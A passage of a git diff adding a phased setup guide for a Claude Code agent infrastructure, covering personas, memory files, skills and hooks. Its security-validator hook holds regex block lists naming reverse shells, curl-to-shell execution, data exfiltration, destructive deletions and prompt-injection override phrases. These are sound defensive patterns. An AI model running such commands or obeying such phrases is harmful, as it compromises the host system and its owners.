diff --git a/.gitignore b/.gitignore index c5ad508..c61649a 100644 --- a/.gitignore +++ b/.gitignore @@ -1 +1,2 @@ Auto\ Run\ Docs/ +*.DS_Store diff --git a/Setup/Claude-Cognitive-Infrastructure/0_INITIALIZE.md b/Setup/Claude-Cognitive-Infrastructure/0_INITIALIZE.md new file mode 100644 index 0000000..af10989 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/0_INITIALIZE.md @@ -0,0 +1,74 @@ +# Phase 0: Initialize + +## Objective + +Validate prerequisites and prepare for Claude Cognitive Infrastructure deployment. + +## Prerequisites Checklist + +### 1. Target Directory + +Verify the target agent directory: + +- [ ] Agent directory exists and is writable +- [ ] Directory has a clear name indicating agent purpose +- [ ] No critical files will be overwritten (or backup is acceptable) + +### 2. Existing Infrastructure Check + +Check for existing `.claude/` directory: + +- [ ] If `.claude/` exists, determine upgrade vs fresh install +- [ ] If upgrading, backup existing memory files +- [ ] Note any custom configurations to preserve + +### 3. 
Agent Context + +Gather information about the agent: + +- [ ] Agent name (from directory name) +- [ ] Organization (from parent directory, if applicable) +- [ ] Agent type/role (inferred from name or existing files) + +## Agent Type Detection + +Based on directory name, detect agent type for customization: + +| Keywords in Name | Agent Type | Persona Suggestion | +|------------------|------------|-------------------| +| Sales, Lead, Pipeline | Sales | Scout | +| Engineer, Architect, Developer | Technical | Archon | +| Research, Analysis | Research | Sage | +| Marketing, Content | Marketing | Maven | +| Fundraising, Investor | Finance | Catalyst | +| Operations, Admin | Operations | Atlas | +| People, Recruiting, HR | People | Harbor | +| Executive, Chief | Executive | Aria | +| Brand, Communications | Communications | Echo | +| Strategy, Planning | Strategy | Compass | +| Customer, Success | Customer | Bridge | +| UX, Design | Design | Pixel | + +## Validation Steps + +1. Confirm agent directory path +2. Check write permissions +3. Detect agent type from name +4. Check for existing infrastructure +5. Determine installation mode (fresh/upgrade) + +## Installation Modes + +### Fresh Install +- Create complete `.claude/` structure +- Generate new CLAUDE.md identity +- Initialize empty memory files + +### Upgrade Install +- Preserve existing memory files +- Update structure to latest version +- Add new capabilities (hooks, skills) + +## Next Phase + +Once prerequisites are validated, proceed to **1_ANALYZE.md** to analyze the agent context. diff --git a/Setup/Claude-Cognitive-Infrastructure/1_ANALYZE.md b/Setup/Claude-Cognitive-Infrastructure/1_ANALYZE.md new file mode 100644 index 0000000..ecdc941 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/1_ANALYZE.md @@ -0,0 +1,106 @@ +# Phase 1: Analyze Agent Context + +## Objective + +Analyze the target agent's context to determine appropriate identity, skills, and configuration. + +## Analysis Tasks + +### 1. 
Directory Analysis + +Examine the agent directory: + +- [ ] Read directory name for agent purpose +- [ ] Check parent directory for organization context +- [ ] Look for existing ROLE.md or similar documentation +- [ ] Identify any existing configuration files + +### 2. Agent Identity Derivation + +From the directory name, derive: + +| Component | Source | Example | +|-----------|--------|---------| +| Agent Name | Directory name | "Sales Lead Agent" | +| Organization | Parent directory | "Wayward Guardian" | +| Persona Name | Generated from type | "Scout" | +| Agent Type | Keywords in name | "Sales" | + +### 3. Role Detection + +If ROLE.md exists, extract: + +- Role description (first paragraph after title) +- Key responsibilities (bulleted lists) +- Domain expertise areas +- Integration points with other agents + +### 4. Existing Files Inventory + +Check for files that inform configuration: + +| File | Purpose | Action | +|------|---------|--------| +| ROLE.md | Role definition | Extract responsibilities | +| README.md | Documentation | Extract context | +| .claude/ | Existing infrastructure | Plan upgrade | +| auto-run/ | Playbooks | Note for integration | + +## Agent Profile Template + +Based on analysis, build agent profile: + +```yaml +agent: + name: "<agent name>" + persona: "<persona name>" + organization: "<organization>" + type: "<agent type>" + +identity: + mission: "<one-sentence mission>" + role: "<2-3 sentence role description>" + +capabilities: + primary: [] # Core responsibilities + secondary: [] # Supporting tasks + +integrations: + collaborates_with: [] # Other agents + tools: [] # External tools +``` + +## Analysis Outputs + +Document the following for use in later phases: + +1. **Agent Profile** - Complete identity information +2. **Installation Mode** - Fresh or upgrade +3. **Customizations Needed** - Based on agent type +4.
**Preservation List** - Files to keep if upgrading + +## Type-Specific Considerations + +### Technical Agents +- Include architecture context directories +- Add development and testing contexts +- Consider code-related hooks + +### Business Agents +- Include projects context +- Add working context for active tasks +- Consider CRM/pipeline integrations + +### Research Agents +- Emphasize knowledge context +- Add research methodology +- Consider web search capabilities + +### Operations Agents +- Include process documentation +- Add tracking and reporting +- Consider scheduling integrations + +## Next Phase + +Proceed to **2_PLAN_STRUCTURE.md** to plan the infrastructure directory structure. diff --git a/Setup/Claude-Cognitive-Infrastructure/2_PLAN_STRUCTURE.md b/Setup/Claude-Cognitive-Infrastructure/2_PLAN_STRUCTURE.md new file mode 100644 index 0000000..7b6a718 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/2_PLAN_STRUCTURE.md @@ -0,0 +1,200 @@ +# Phase 2: Plan Structure + +## Objective + +Plan the complete Claude Cognitive Infrastructure directory structure for the agent.
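The keyword-to-type detection from Phase 0 feeds directly into this plan. A minimal sketch of that mapping, assuming a simple first-match rule (the `detectAgentType` helper and its abbreviated table are illustrative only — they are not part of the installed infrastructure):

```typescript
// Illustrative helper: derives agent type and persona from a directory
// name, following the Phase 0 detection table (abbreviated here).
const TYPE_TABLE: Array<[RegExp, string, string]> = [
  [/sales|lead|pipeline/i, "Sales", "Scout"],
  [/engineer|architect|developer/i, "Technical", "Archon"],
  [/research|analysis/i, "Research", "Sage"],
  [/marketing|content/i, "Marketing", "Maven"],
  [/operations|admin/i, "Operations", "Atlas"],
];

function detectAgentType(dirName: string): { type: string; persona: string } {
  // First match wins, so more specific keywords should come first.
  for (const [pattern, type, persona] of TYPE_TABLE) {
    if (pattern.test(dirName)) return { type, persona };
  }
  // Fallback is an assumption; Phase 0 does not define a default.
  return { type: "General", persona: "Aide" };
}
```

For example, `detectAgentType("Sales Lead Agent")` yields type `Sales` and persona `Scout`, matching the Phase 0 table.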
+ +## Core Directory Structure + +``` +/ +├── CLAUDE.md # Agent identity file +└── .claude/ + ├── VERSION # Infrastructure version (1.1.0) + ├── settings.json # Hook and behavior settings + ├── config/ + │ └── config.yaml # Runtime configuration + ├── skills/ + │ └── CORE/ + │ └── SKILL.md # Core agent skill + ├── context/ + │ ├── CLAUDE.md # Context system documentation + │ ├── memory/ + │ │ ├── learnings.md # Accumulated knowledge + │ │ ├── user_preferences.md # User working style + │ │ └── work_status.md # Current task tracking + │ ├── architecture/ + │ │ └── CLAUDE.md # Architecture context + │ ├── design/ + │ │ └── CLAUDE.md # Design principles + │ ├── development/ + │ │ └── CLAUDE.md # Development context + │ ├── projects/ + │ │ └── CLAUDE.md # Project configs + │ ├── testing/ + │ │ └── CLAUDE.md # Testing guidelines + │ ├── tools/ + │ │ └── CLAUDE.md # Tool documentation + │ └── working/ + │ └── CLAUDE.md # Working context + ├── hooks/ + │ └── CLAUDE.md # Hooks documentation + ├── agents/ + │ └── CLAUDE.md # Agent definitions + ├── scripts/ + │ └── CLAUDE.md # Utility scripts + └── examples/ + └── CLAUDE.md # Reference examples +``` + +## File Contents Plan + +### CLAUDE.md (Root Identity) + +```markdown +# <Agent Name>: <Persona> + +## Your Name +Your name is **<Persona>**. You are the <agent type> agent for <Organization>. + +## Your Mission +<one-sentence mission statement> + +## Your Role +<2-3 sentence role description> + +## Core Responsibilities +<bulleted list of responsibilities> + +## Memory Management +**CRITICAL:** Update work_status.md after EVERY conversation turn.
+ +## Organization Context +<organization context> +``` + +### settings.json + +```json +{ + "hooks": { + "preToolCall": [], + "postToolCall": [], + "notification": [] + }, + "permissions": { + "tools": ["Read", "Write", "Edit", "Bash", "Glob", "Grep"] + } +} +``` + +### VERSION + +``` +1.1.0 +``` + +### config/config.yaml + +```yaml +version: "1.1.0" +agent: + name: "<agent name>" + persona: "<persona name>" + type: "<agent type>" +settings: + memory_update_frequency: "every_turn" + context_loading: "progressive" +``` + +### CORE/SKILL.md + +```markdown +--- +name: CORE +version: 1.0.0 +priority: 100 +triggers: + - identity + - who are you + - what do you do +context_budget: 5000 +--- + +# <Persona>: Core Identity + +## Overview +<2-3 sentence overview of the agent> + +## Primary Functions +<bulleted list of functions> + +## Working Style +<working style notes> +``` + +### Memory Files + +**learnings.md:** +```markdown +# Learnings + +Facts and knowledge accumulated about users, organization, and domain. + +## Users + +## Organization + +## Domain Knowledge +``` + +**user_preferences.md:** +```markdown +# User Preferences + +Working style and preferences for interactions. + +## Communication Style + +## Working Hours + +## Preferences +``` + +**work_status.md:** +```markdown +# Work Status + +Current tasks and progress tracking. + +## Active Tasks + +## Pending Items + +## Recently Completed + +--- +*Last updated: <date>* +``` + +## Context Placeholder Files + +Each context subdirectory gets a CLAUDE.md placeholder: + +```markdown +# <Domain> Context + +This directory contains <domain> information. + +## Contents + +<description of files in this directory> + +## Usage + +<when to load this context> +``` + +## Next Phase + +Proceed to **3_EVALUATE.md** to evaluate the planned structure. diff --git a/Setup/Claude-Cognitive-Infrastructure/3_EVALUATE.md b/Setup/Claude-Cognitive-Infrastructure/3_EVALUATE.md new file mode 100644 index 0000000..40ae120 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/3_EVALUATE.md @@ -0,0 +1,95 @@ +# Phase 3: Evaluate Plan + +## Objective + +Evaluate the infrastructure plan for completeness, correctness, and safety. + +## Evaluation Checklist + +### 1.
Identity Completeness + +- [ ] Agent name is clear and descriptive +- [ ] Persona name is short and memorable +- [ ] Mission statement is concise (one sentence) +- [ ] Role description explains purpose (2-3 sentences) +- [ ] Responsibilities are specific and actionable + +### 2. Structure Completeness + +- [ ] All required directories planned +- [ ] All required files identified +- [ ] Memory files initialized with proper structure +- [ ] CORE skill has appropriate triggers + +### 3. Configuration Validity + +- [ ] settings.json is valid JSON +- [ ] config.yaml is valid YAML +- [ ] VERSION file contains valid semver +- [ ] File paths are correct + +### 4. Content Quality + +- [ ] CLAUDE.md follows standard template +- [ ] SKILL.md has valid frontmatter +- [ ] Memory update instruction is present +- [ ] Organization context is included + +### 5. Safety Checks + +- [ ] No existing files will be overwritten without backup +- [ ] No sensitive data in templates +- [ ] Permissions are appropriate +- [ ] No destructive operations planned + +## Validation Matrix + +| Component | Required | Planned | Valid | +|-----------|----------|---------|-------| +| CLAUDE.md | Yes | | | +| .claude/ | Yes | | | +| settings.json | Yes | | | +| VERSION | Yes | | | +| config/config.yaml | Yes | | | +| skills/CORE/SKILL.md | Yes | | | +| context/memory/ | Yes | | | +| context/CLAUDE.md | Yes | | | +| hooks/ | Yes | | | + +## Risk Assessment + +### Low Risk +- Creating new directories +- Creating new files in empty locations +- Adding placeholder CLAUDE.md files + +### Medium Risk +- Overwriting existing CLAUDE.md +- Modifying existing settings.json + +### High Risk (Require Confirmation) +- Overwriting existing memory files +- Deleting existing content +- Modifying existing skills + +## Pre-Implementation Checklist + +Before proceeding to implementation: + +- [ ] All directories identified +- [ ] All file contents drafted +- [ ] Agent identity finalized +- [ ] Backup plan for existing 
files (if applicable) +- [ ] No blocking issues identified + +## Approval Gate + +Implementation can proceed when: +1. All required components are planned +2. All content passes validation +3. No high-risk operations without mitigation +4. Structure matches infrastructure specification + +## Next Phase + +If evaluation passes, proceed to **4_IMPLEMENT.md** to execute the installation. diff --git a/Setup/Claude-Cognitive-Infrastructure/4_IMPLEMENT.md b/Setup/Claude-Cognitive-Infrastructure/4_IMPLEMENT.md new file mode 100644 index 0000000..812c0ff --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/4_IMPLEMENT.md @@ -0,0 +1,970 @@ +# Phase 4: Implement Installation + +## Objective + +Execute the complete Claude Cognitive Infrastructure installation including the Hook System, Memory System, and Skills System. + +--- + +## Part 1: Directory Structure + +### Step 1.1: Create Base Directory Tree + +```bash +mkdir -p .claude/{config,hooks/lib,agents,scripts,examples} +mkdir -p .claude/skills/{CORE/{SYSTEM,USER,Workflows},CreateSkill} +mkdir -p .claude/MEMORY/{State,Signals,Work,Learning/{OBSERVE,THINK,PLAN,BUILD,EXECUTE,VERIFY}} +mkdir -p .claude/MEMORY/{research,sessions,learnings,decisions,execution,security,recovery,raw-outputs,backups} +``` + +### Step 1.2: Create VERSION File + +```bash +echo "1.1.0" > .claude/VERSION +``` + +--- + +## Part 2: Hook System + +The Hook System provides event-driven automation that fires at key lifecycle points. 
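All four hooks below share one contract: Claude Code pipes a JSON payload to the hook on stdin, and the hook's exit code decides the outcome — 0 allows the tool call to proceed, 2 blocks it (as the security validator's own comment notes). A minimal sketch of that protocol, with the policy factored into a pure function so it can be tested in isolation (this skeleton is illustrative, not one of the installed hooks):

```typescript
// Payload shape a PreToolUse hook receives on stdin (mirrors the
// interfaces used by the hooks below).
interface HookPayload {
  session_id: string;
  tool_name: string;
  tool_input: Record<string, unknown>;
}

// Pure decision function: returns the exit code the hook should end with.
// 0 = allow the tool call, 2 = block it.
function decide(payload: HookPayload): number {
  if (payload.tool_name !== "Bash") return 0; // only gate Bash here
  const cmd = String(payload.tool_input["command"] ?? "");
  return /rm\s+(-rf?|--recursive)\s+\//.test(cmd) ? 2 : 0;
}

// The stdin wiring each real hook repeats (Bun runtime):
//   const payload: HookPayload = JSON.parse(await Bun.stdin.text());
//   process.exit(decide(payload));
```

Keeping the decision logic pure makes each hook testable without piping stdin; the full validator in Step 2.2 applies the same pattern across ten tiers of rules.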
+ +### Step 2.1: Create settings.json + +Create `.claude/settings.json`: + +```json +{ + "hooks": { + "SessionStart": [ + { + "matcher": "*", + "hooks": [ + { + "type": "command", + "command": "bun run .claude/hooks/initialize-session.ts" + }, + { + "type": "command", + "command": "bun run .claude/hooks/load-core-context.ts" + } + ] + } + ], + "PreToolUse": [ + { + "matcher": "Bash", + "hooks": [ + { + "type": "command", + "command": "bun run .claude/hooks/security-validator.ts" + } + ] + } + ], + "PostToolUse": [ + { + "matcher": "*", + "hooks": [ + { + "type": "command", + "command": "bun run .claude/hooks/event-logger.ts" + } + ] + } + ], + "Stop": [ + { + "matcher": "*", + "hooks": [ + { + "type": "command", + "command": "bun run .claude/hooks/session-summary.ts" + } + ] + } + ] + }, + "permissions": { + "tools": ["Read", "Write", "Edit", "Bash", "Glob", "Grep", "WebFetch", "WebSearch", "Task"] + } +} +``` + +### Step 2.2: Create Security Validator Hook + +Create `.claude/hooks/security-validator.ts`: + +```typescript +#!/usr/bin/env bun +// Security validator - PreToolUse hook for Bash commands +// Validates commands and blocks dangerous operations + +interface PreToolUsePayload { + session_id: string; + tool_name: string; + tool_input: Record<string, unknown>; +} + +// Attack pattern categories - 10 tiers of protection +const ATTACK_PATTERNS = { + // Tier 1: Catastrophic - Always block + catastrophic: { + patterns: [ + /rm\s+(-rf?|--recursive)\s+[\/~]/i, + /rm\s+(-rf?|--recursive)\s+\*/i, + />\s*\/dev\/sd[a-z]/i, + /mkfs\./i, + /dd\s+if=.*of=\/dev/i, + ], + action: 'block', + message: 'BLOCKED: Catastrophic deletion/destruction detected' + }, + + // Tier 2: Reverse shells - Always block + reverseShell: { + patterns: [ + /bash\s+-i\s+>&\s*\/dev\/tcp/i, + /nc\s+(-e|--exec)\s+\/bin\/(ba)?sh/i, + /python.*socket.*connect/i, + /perl.*socket.*connect/i, + /ruby.*TCPSocket/i, + /php.*fsockopen/i, + /socat.*exec/i, + /\|\s*\/bin\/(ba)?sh/i, + ], + action: 'block', + message:
'BLOCKED: Reverse shell pattern detected' + }, + + // Tier 3: Credential theft - Always block + credentialTheft: { + patterns: [ + /curl.*\|\s*(ba)?sh/i, + /wget.*\|\s*(ba)?sh/i, + /curl.*(-o|--output).*&&.*chmod.*\+x/i, + /base64\s+-d.*\|\s*(ba)?sh/i, + ], + action: 'block', + message: 'BLOCKED: Remote code execution pattern detected' + }, + + // Tier 4: Prompt injection indicators - Block and log + promptInjection: { + patterns: [ + /ignore\s+(all\s+)?previous\s+instructions/i, + /disregard\s+(all\s+)?prior\s+instructions/i, + /you\s+are\s+now\s+(in\s+)?[a-z]+\s+mode/i, + /new\s+instruction[s]?:/i, + /system\s+prompt:/i, + /\[INST\]/i, + /<\|im_start\|>/i, + ], + action: 'block', + message: 'BLOCKED: Prompt injection pattern detected' + }, + + // Tier 5: Environment manipulation - Warn + envManipulation: { + patterns: [ + /export\s+(ANTHROPIC|OPENAI|AWS|AZURE)_/i, + /echo\s+\$\{?(ANTHROPIC|OPENAI)_/i, + /env\s*\|.*KEY/i, + /printenv.*KEY/i, + ], + action: 'warn', + message: 'WARNING: Environment/credential access detected' + }, + + // Tier 6: Git dangerous operations - Require confirmation + gitDangerous: { + patterns: [ + /git\s+push.*(-f|--force)/i, + /git\s+reset\s+--hard/i, + /git\s+clean\s+-fd/i, + /git\s+checkout\s+--\s+\./i, + ], + action: 'warn', + message: 'WARNING: Potentially destructive git operation' + }, + + // Tier 7: System modification - Log + systemMod: { + patterns: [ + /chmod\s+777/i, + /chown\s+root/i, + /sudo\s+/i, + /systemctl\s+(stop|disable)/i, + ], + action: 'log', + message: 'LOGGED: System modification command' + }, + + // Tier 8: Network operations - Log + network: { + patterns: [ + /ssh\s+/i, + /scp\s+/i, + /rsync.*:/i, + /curl\s+(-X\s+POST|--data)/i, + ], + action: 'log', + message: 'LOGGED: Network operation' + }, + + // Tier 9: Data exfiltration patterns - Block + exfiltration: { + patterns: [ + /curl.*(@|--upload-file)/i, + /tar.*\|.*curl/i, + /zip.*\|.*nc/i, + ], + action: 'block', + message: 'BLOCKED: Data exfiltration pattern 
detected' + }, + + // Tier 10: Infrastructure protection - Block + infraProtection: { + patterns: [ + /rm.*\.claude/i, + /rm.*\.config/i, + ], + action: 'block', + message: 'BLOCKED: Infrastructure protection triggered' + } +}; + +function validateCommand(command: string): { allowed: boolean; message?: string; action?: string } { + if (!command || command.length < 3) { + return { allowed: true }; + } + + for (const [tierName, tier] of Object.entries(ATTACK_PATTERNS)) { + for (const pattern of tier.patterns) { + if (pattern.test(command)) { + console.error(`[Security] ${tierName}: ${tier.message}`); + console.error(`[Security] Command: ${command.substring(0, 100)}...`); + return { + allowed: tier.action !== 'block', + message: tier.message, + action: tier.action + }; + } + } + } + + return { allowed: true }; +} + +async function main() { + try { + const stdinData = await Bun.stdin.text(); + if (!stdinData.trim()) { + process.exit(0); + } + + const payload: PreToolUsePayload = JSON.parse(stdinData); + + if (payload.tool_name !== 'Bash') { + process.exit(0); + } + + const command = payload.tool_input?.command; + if (!command) { + process.exit(0); + } + + const validation = validateCommand(command); + + if (!validation.allowed) { + console.log(validation.message); + console.log(`Command blocked: ${command.substring(0, 100)}...`); + process.exit(2); // Exit code 2 signals block to Claude Code + } + + if (validation.action === 'warn') { + console.log(validation.message); + } + + } catch (error) { + console.error('Security validator error:', error); + } + + process.exit(0); +} + +main(); +``` + +### Step 2.3: Create Initialize Session Hook + +Create `.claude/hooks/initialize-session.ts`: + +```typescript +#!/usr/bin/env bun +// Initialize session - SessionStart hook +// Sets up session state and loads initial context + +import { writeFileSync, existsSync, mkdirSync } from 'fs'; + +const MEMORY_DIR = '.claude/MEMORY'; +const STATE_DIR = `${MEMORY_DIR}/State`; + +async 
function main() { + try { + // Ensure directories exist + if (!existsSync(STATE_DIR)) { + mkdirSync(STATE_DIR, { recursive: true }); + } + + // Initialize or update session state + const sessionState = { + session_id: `session_${Date.now()}`, + started_at: new Date().toISOString(), + status: 'active' + }; + + writeFileSync( + `${STATE_DIR}/active-session.json`, + JSON.stringify(sessionState, null, 2) + ); + + console.log(`Session initialized: ${sessionState.session_id}`); + + } catch (error) { + console.error('Session initialization error:', error); + } +} + +main(); +``` + +### Step 2.4: Create Load Core Context Hook + +Create `.claude/hooks/load-core-context.ts`: + +```typescript +#!/usr/bin/env bun +// Load core context - SessionStart hook +// Loads CORE skill content at session start + +import { readFileSync, existsSync } from 'fs'; + +const CORE_SKILL_PATH = '.claude/skills/CORE/SKILL.md'; + +async function main() { + try { + if (existsSync(CORE_SKILL_PATH)) { + const content = readFileSync(CORE_SKILL_PATH, 'utf-8'); + // Output to stdout for context injection + console.log('--- CORE CONTEXT LOADED ---'); + console.log(content); + console.log('--- END CORE CONTEXT ---'); + } + } catch (error) { + console.error('Context loading error:', error); + } +} + +main(); +``` + +### Step 2.5: Create Event Logger Hook + +Create `.claude/hooks/event-logger.ts`: + +```typescript +#!/usr/bin/env bun +// Event logger - PostToolUse hook +// Logs tool executions to MEMORY + +import { appendFileSync, existsSync, mkdirSync } from 'fs'; + +const RAW_OUTPUT_DIR = '.claude/MEMORY/raw-outputs'; + +interface PostToolUsePayload { + session_id: string; + tool_name: string; + tool_input: Record<string, unknown>; + tool_output?: string; +} + +async function main() { + try { + const stdinData = await Bun.stdin.text(); + if (!stdinData.trim()) { + process.exit(0); + } + + const payload: PostToolUsePayload = JSON.parse(stdinData); + + // Ensure directory exists + if (!existsSync(RAW_OUTPUT_DIR)) {
mkdirSync(RAW_OUTPUT_DIR, { recursive: true }); + } + + // Create log entry + const logEntry = { + timestamp: new Date().toISOString(), + session_id: payload.session_id, + tool_name: payload.tool_name, + tool_input: payload.tool_input + }; + + // Append to daily log file + const today = new Date().toISOString().split('T')[0]; + const logFile = `${RAW_OUTPUT_DIR}/${today}.jsonl`; + + appendFileSync(logFile, JSON.stringify(logEntry) + '\n'); + + } catch (error) { + // Silent fail - logging should never break execution + } +} + +main(); +``` + +### Step 2.6: Create Session Summary Hook + +Create `.claude/hooks/session-summary.ts`: + +```typescript +#!/usr/bin/env bun +// Session summary - Stop hook +// Captures session summary when session ends + +import { writeFileSync, readFileSync, existsSync, mkdirSync } from 'fs'; + +const SESSIONS_DIR = '.claude/MEMORY/sessions'; +const STATE_DIR = '.claude/MEMORY/State'; + +async function main() { + try { + // Ensure directory exists + if (!existsSync(SESSIONS_DIR)) { + mkdirSync(SESSIONS_DIR, { recursive: true }); + } + + // Read active session state + const sessionFile = `${STATE_DIR}/active-session.json`; + let sessionId = 'unknown'; + let startedAt = new Date().toISOString(); + + if (existsSync(sessionFile)) { + const state = JSON.parse(readFileSync(sessionFile, 'utf-8')); + sessionId = state.session_id || sessionId; + startedAt = state.started_at || startedAt; + } + + // Create session summary + const summary = { + session_id: sessionId, + started_at: startedAt, + ended_at: new Date().toISOString(), + status: 'completed' + }; + + // Save to sessions directory + const filename = `${SESSIONS_DIR}/${sessionId}.json`; + writeFileSync(filename, JSON.stringify(summary, null, 2)); + + console.log(`Session summary saved: ${filename}`); + + } catch (error) { + console.error('Session summary error:', error); + } +} + +main(); +``` + +--- + +## Part 3: Memory System + +The Memory System provides persistent knowledge across sessions
using a three-tier architecture. + +### Step 3.1: Create MEMORY README + +Create `.claude/MEMORY/README.md`: + +```markdown +# MEMORY System + +Persistent memory architecture for session history, learnings, and operational state. + +## Directory Structure + +| Directory | Purpose | Retention | +|-----------|---------|-----------| +| `research/` | Deep research outputs | Permanent | +| `sessions/` | Session summaries (auto-captured) | Rolling 90 days | +| `learnings/` | Learning moments | Permanent | +| `decisions/` | Architectural Decision Records | Permanent | +| `execution/` | Task execution logs | Rolling 30 days | +| `security/` | Security event logs | Permanent | +| `recovery/` | Recovery snapshots | Rolling 7 days | +| `raw-outputs/` | JSONL event streams | Rolling 7 days | +| `backups/` | Pre-refactoring backups | As needed | +| `State/` | Current operational state | Active | +| `Signals/` | Pattern detection | Active | +| `Work/` | Per-task memory | Active | +| `Learning/` | Phase-based learnings | Permanent | + +## Three-Tier Memory Model + +### 1. CAPTURE (Hot) - Per-Task Work + +Current work items in `Work/[Task-Name_TIMESTAMP]/`: +- `Work.md` - Goal, result, signal tracking +- `TRACE.jsonl` - Decision trace +- `Output/` - Deliverables produced + +### 2. SYNTHESIS (Warm) - Aggregated Learning + +Learnings organized by phase in `Learning/`: +- `OBSERVE/` - Context gathering learnings +- `THINK/` - Hypothesis generation learnings +- `PLAN/` - Execution planning learnings +- `BUILD/` - Success criteria learnings +- `EXECUTE/` - Implementation learnings +- `VERIFY/` - Verification learnings + +### 3. APPLICATION (Cold) - Archived History + +Historical data organized by date in main directories. 
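+ +### Example: JSONL Entries + +`TRACE.jsonl` and the Signal files share the JSONL convention: one self-describing JSON object per line, append-only. A hypothetical trace entry (field names are illustrative): + +\`\`\`json +{"timestamp": "2025-01-01T12:00:00Z", "phase": "VERIFY", "decision": "loopback to PLAN", "reason": "success criteria unmet"} +\`\`\`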
+ +## Privacy + +Add to .gitignore: +\`\`\` +.claude/MEMORY/raw-outputs/ +.claude/MEMORY/sessions/ +.claude/MEMORY/security/ +\`\`\` +``` + +### Step 3.2: Initialize State Files + +Create `.claude/MEMORY/State/active-work.json`: + +```json +{ + "current_task": null, + "started_at": null, + "status": "idle" +} +``` + +### Step 3.3: Initialize Signal Files + +Create `.claude/MEMORY/Signals/README.md`: + +```markdown +# Signals + +Real-time pattern detection and anomaly tracking. + +## Signal Files + +| File | Purpose | +|------|---------| +| `failures.jsonl` | VERIFY failures with context | +| `loopbacks.jsonl` | Phase loopback events | +| `patterns.jsonl` | Weekly aggregated patterns | + +## Format + +Each file uses JSONL (JSON Lines) format - one JSON object per line. +``` + +--- + +## Part 4: Skills System + +The Skills System provides modular domain expertise with tiered loading. + +### Step 4.1: Create CORE Skill + +Create `.claude/skills/CORE/SKILL.md`: + +```markdown +--- +name: CORE +description: Core identity and configuration. AUTO-LOADS at session start. USE WHEN session begins OR user asks about identity, capabilities, or how the agent works. +--- + +# CORE - Agent Identity + +**Auto-loads at session start.** This skill defines agent identity and core operating principles. + +## Examples + +**Example: Identity query** +\`\`\` +User: "Who are you?" +-> Reads CORE skill +-> Returns identity information +\`\`\` + +**Example: Capability check** +\`\`\` +User: "What can you do?" 
+-> Lists available capabilities +-> References other skills if installed +``` + +--- + +## Identity + +**Agent:** <agent name> +**Role:** <role> +**Organization:** <organization> + +--- + +## Available Capabilities + +- **Memory System**: Persistent knowledge across sessions +- **Skills Framework**: Modular domain expertise +- **Hook System**: Event-driven automation +- **Context System**: Structured knowledge by domain + +--- + +## Quick Reference + +- Skills directory: `.claude/skills/` +- Memory directory: `.claude/MEMORY/` +- Configuration: `.claude/settings.json` +``` + +### Step 4.2: Create Skill System Documentation + +Create `.claude/skills/CORE/SYSTEM/SKILLSYSTEM.md`: + +```markdown +# Custom Skill System + +The configuration system for all skills. + +## Skill Structure + +Every skill follows this structure: + +\`\`\` +SkillName/ +├── SKILL.md # Main skill file (required) +├── Context.md # Additional context (optional) +├── Tools/ # CLI tools +│ └── ToolName.ts +└── Workflows/ # Execution workflows + └── WorkflowName.md +\`\`\` + +## SKILL.md Format + +### YAML Frontmatter + +\`\`\`yaml +--- +name: SkillName +description: [What it does]. USE WHEN [intent triggers]. [Additional capabilities]. +--- +\`\`\` + +**Rules:** +- `name` uses TitleCase +- `description` is a single line +- `USE WHEN` keyword is mandatory for activation +- Max 1024 characters + +### Markdown Body + +\`\`\`markdown +# SkillName + +[Brief description] + +## Workflow Routing + +| Workflow | Trigger | File | +|----------|---------|------| +| **Create** | "create new" | \`Workflows/Create.md\` | + +## Examples + +**Example 1:** +\`\`\` +User: "[Request]" +-> [Action taken] +-> [Result] +\`\`\` +\`\`\` + +## Skill Loading + +1. **Session Start**: Only YAML frontmatter loads for routing +2. **Skill Invocation**: Full SKILL.md body loads +3. **Workflow Execution**: Additional files load on-demand + +## Creating New Skills + +Use the CreateSkill skill or manually create following this structure.
+``` + +### Step 4.3: Create CreateSkill Skill + +Create `.claude/skills/CreateSkill/SKILL.md`: + +```markdown +--- +name: CreateSkill +description: Creates new skills following the standard structure. USE WHEN user wants to create a new skill OR add new capability OR needs a custom workflow. +--- + +# CreateSkill + +Creates properly structured skills following the Skills System specification. + +## Workflow Routing + +| Workflow | Trigger | File | +|----------|---------|------| +| **Create** | "create skill", "new skill" | `Workflows/Create.md` | + +## Examples + +**Example: Create a code review skill** +\`\`\` +User: "Create a skill for code review" +-> Creates .claude/skills/CodeReview/SKILL.md +-> Adds proper YAML frontmatter with USE WHEN +-> Creates Workflows/ and Tools/ directories +-> Returns confirmation with skill path +\`\`\` + +## Skill Template + +When creating a skill, use this template: + +\`\`\`markdown +--- +name: SkillName +description: [Purpose]. USE WHEN [triggers]. +--- + +# SkillName + +[Description] + +## Workflow Routing + +| Workflow | Trigger | File | +|----------|---------|------| + +## Examples + +**Example:** +\`\`\` +User: "[Request]" +-> [Process] +-> [Result] +\`\`\` +\`\`\` +``` + +### Step 4.4: Create USER Configuration Directory + +Create `.claude/skills/CORE/USER/README.md`: + +```markdown +# USER Configuration + +Personal configuration that customizes agent behavior. + +## Files + +| File | Purpose | +|------|---------| +| `ABOUTME.md` | User background and context | +| `PREFERENCES.md` | Working style preferences | +| `CONTACTS.md` | Contact information | + +## Privacy + +This directory contains personal information. Add to .gitignore if version controlling: + +\`\`\` +.claude/skills/CORE/USER/ +\`\`\` + +## Customization + +Create files as needed to personalize the agent's knowledge about you and your preferences.
+``` + +### Step 4.5: Create SYSTEM Documentation Directory + +Create `.claude/skills/CORE/SYSTEM/README.md`: + +```markdown +# SYSTEM Documentation + +System-level documentation for the Claude Cognitive Infrastructure. + +## Files + +| File | Purpose | +|------|---------| +| `SKILLSYSTEM.md` | Skill creation and structure | +| `MEMORYSYSTEM.md` | Memory architecture | +| `HOOKSYSTEM.md` | Event-driven automation | + +## Usage + +These files provide reference documentation. They are loaded on-demand when relevant context is needed. +``` + +--- + +## Part 5: Agent Identity + +### Step 5.1: Create config.yaml + +Create `.claude/config/config.yaml`: + +```yaml +version: "1.1.0" +infrastructure: + name: "Claude Cognitive Infrastructure" + installed: "<installation date>" + +agent: + name: "<agent name>" + persona: "<persona name>" + type: "<agent type>" + organization: "<organization>" + +settings: + memory_update_frequency: "every_turn" + context_loading: "progressive" + skill_activation: "trigger_based" + +capabilities: + memory: true + skills: true + hooks: true + context: true +``` + +### Step 